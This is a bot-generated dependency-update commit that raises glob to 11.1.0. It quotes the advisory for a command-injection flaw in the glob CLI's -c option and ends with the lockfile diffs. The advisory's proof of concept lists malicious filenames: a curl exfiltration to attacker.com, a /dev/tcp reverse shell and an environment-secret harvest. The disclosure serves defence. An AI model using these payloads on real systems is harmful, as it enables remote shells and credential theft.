chore(deps): update dependency glob to v11.1.0 [security] (#7950)

renovate[bot] · web-flow · commit 15d6d82877cb · 2025-11-18T08:16:46.000Z
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [glob](https://redirect.github.com/isaacs/node-glob) | [`11.0.3` -> `11.1.0`](https://renovatebot.com/diffs/npm/glob/11.0.3/11.1.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/glob/11.1.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/glob/11.0.3/11.1.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2) ### Summary The glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c <command> <patterns>` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. ### Details **Root Cause:** The vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`: ```javascript stream.on('end', () => foregroundChild(cmd, matches, { shell: true })) ``` **Technical Flow:** 1. User runs `glob -c <command> <pattern>` 2. CLI finds files matching the pattern 3. Matched filenames are collected into an array 4. Command is executed with matched filenames as arguments using `shell: true` 5. Shell interprets metacharacters in filenames as command syntax 6. Malicious filenames execute arbitrary commands **Affected Component:** - **CLI Only:** The vulnerability affects only the command-line interface - **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected - **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems) **Attack Surface:** - Files with names containing shell metacharacters: `$()`, backticks, `;`, `&`, `|`, etc. - Any directory where attackers can control filenames (PR branches, archives, user uploads) - CI/CD pipelines using `glob -c` on untrusted content ### PoC **Setup Malicious File:** ```bash mkdir test_directory && cd test_directory # Create file with command injection payload in filename touch '$(touch injected_poc)' ``` **Trigger Vulnerability:** ```bash # Run glob CLI with -c option node /path/to/glob/dist/esm/bin.mjs -c echo "**/*" ``` **Result:** - The echo command executes normally - **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell - A new file `injected_poc` is created, proving command execution - Any command can be injected this way with full user privileges **Advanced Payload Examples:** **Data Exfiltration:** ```bash # Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1) touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)' ``` **Reverse Shell:** ```bash # Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1) touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)' ``` **Environment Variable Harvesting:** ```bash # Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt) touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)' ``` ### Impact **Arbitrary Command Execution:** - Commands execute with full privileges of the user running glob CLI - No privilege escalation required - runs as current user - Access to environment variables, file system, and network **Real-World Attack Scenarios:** **1. CI/CD Pipeline Compromise:** - Malicious PR adds files with crafted names to repository - CI pipeline uses `glob -c` to process files (linting, testing, deployment) - Commands execute in CI environment with build secrets and deployment credentials - Potential for supply chain compromise through artifact tampering **2. Developer Workstation Attack:** - Developer clones repository or extracts archive containing malicious filenames - Local build scripts use `glob -c` for file processing - Developer machine compromise with access to SSH keys, tokens, local services **3. Automated Processing Systems:** - Services using glob CLI to process uploaded files or external content - File uploads with malicious names trigger command execution - Server-side compromise with potential for lateral movement **4. Supply Chain Poisoning:** - Malicious packages or themes include files with crafted names - Build processes using glob CLI automatically process these files - Wide distribution of compromise through package ecosystems **Platform-Specific Risks:** - **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing - **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL - **Mixed Environments:** CI systems often use Linux containers regardless of developer platform ### Affected Products - **Ecosystem:** npm - **Package name:** glob - **Component:** CLI only (`src/bin.mts`) - **Affected versions:** v10.3.7 through v11.0.3 (and likely later versions until patched) - **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd` option) - **Patched versions:** 11.1.0 **Scope Limitation:** - **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe - **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable ### Remediation - Upgrade to `glob@11.1.0` or higher, as soon as possible. - If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead. - As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but ensure that no untrusted contents can possibly be encountered in the file path results. --- ### Release Notes <details> <summary>isaacs/node-glob (glob)</summary> ### [`v11.1.0`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0) [Compare Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/UI5/webcomponents-react).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
diff --git a/package.json b/package.json
@@ -83,7 +83,7 @@
     "eslint-plugin-react": "7.37.5",
     "eslint-plugin-react-hooks": "6.1.1",
     "eslint-plugin-storybook": "9.1.16",
-    "glob": "11.0.3",
+    "glob": "11.1.0",
     "globals": "16.5.0",
     "husky": "9.1.7",
     "lerna": "9.0.1",
diff --git a/yarn.lock b/yarn.lock
@@ -11422,19 +11422,19 @@ __metadata:
   languageName: node
   linkType: hard
 
-"glob@npm:11.0.3, glob@npm:^11.0.3":
-  version: 11.0.3
-  resolution: "glob@npm:11.0.3"
+"glob@npm:11.1.0":
+  version: 11.1.0
+  resolution: "glob@npm:11.1.0"
   dependencies:
     foreground-child: "npm:^3.3.1"
     jackspeak: "npm:^4.1.1"
-    minimatch: "npm:^10.0.3"
+    minimatch: "npm:^10.1.1"
     minipass: "npm:^7.1.2"
     package-json-from-dist: "npm:^1.0.0"
     path-scurry: "npm:^2.0.0"
   bin:
     glob: dist/esm/bin.mjs
-  checksum: 10c0/7d24457549ec2903920dfa3d8e76850e7c02aa709122f0164b240c712f5455c0b457e6f2a1eee39344c6148e39895be8094ae8cfef7ccc3296ed30bce250c661
+  checksum: 10c0/1ceae07f23e316a6fa74581d9a74be6e8c2e590d2f7205034dd5c0435c53f5f7b712c2be00c3b65bf0a49294a1c6f4b98cd84c7637e29453b5aa13b79f1763a2
   languageName: node
   linkType: hard
 
@@ -11468,6 +11468,22 @@ __metadata:
   languageName: node
   linkType: hard
 
+"glob@npm:^11.0.3":
+  version: 11.0.3
+  resolution: "glob@npm:11.0.3"
+  dependencies:
+    foreground-child: "npm:^3.3.1"
+    jackspeak: "npm:^4.1.1"
+    minimatch: "npm:^10.0.3"
+    minipass: "npm:^7.1.2"
+    package-json-from-dist: "npm:^1.0.0"
+    path-scurry: "npm:^2.0.0"
+  bin:
+    glob: dist/esm/bin.mjs
+  checksum: 10c0/7d24457549ec2903920dfa3d8e76850e7c02aa709122f0164b240c712f5455c0b457e6f2a1eee39344c6148e39895be8094ae8cfef7ccc3296ed30bce250c661
+  languageName: node
+  linkType: hard
+
 "glob@npm:^7.1.3, glob@npm:^7.1.4, glob@npm:^7.1.6, glob@npm:^7.2.0":
   version: 7.2.3
   resolution: "glob@npm:7.2.3"
@@ -15416,6 +15432,15 @@ __metadata:
   languageName: node
   linkType: hard
 
+"minimatch@npm:^10.1.1":
+  version: 10.1.1
+  resolution: "minimatch@npm:10.1.1"
+  dependencies:
+    "@isaacs/brace-expansion": "npm:^5.0.0"
+  checksum: 10c0/c85d44821c71973d636091fddbfbffe62370f5ee3caf0241c5b60c18cd289e916200acb2361b7e987558cd06896d153e25d505db9fc1e43e6b4b6752e2702902
+  languageName: node
+  linkType: hard
+
 "minimatch@npm:^3.0.4, minimatch@npm:^3.0.5, minimatch@npm:^3.1.1, minimatch@npm:^3.1.2":
   version: 3.1.2
   resolution: "minimatch@npm:3.1.2"
@@ -20941,7 +20966,7 @@ __metadata:
     eslint-plugin-react: "npm:7.37.5"
     eslint-plugin-react-hooks: "npm:6.1.1"
     eslint-plugin-storybook: "npm:9.1.16"
-    glob: "npm:11.0.3"
+    glob: "npm:11.1.0"
     globals: "npm:16.5.0"
     husky: "npm:9.1.7"
     lerna: "npm:9.0.1"
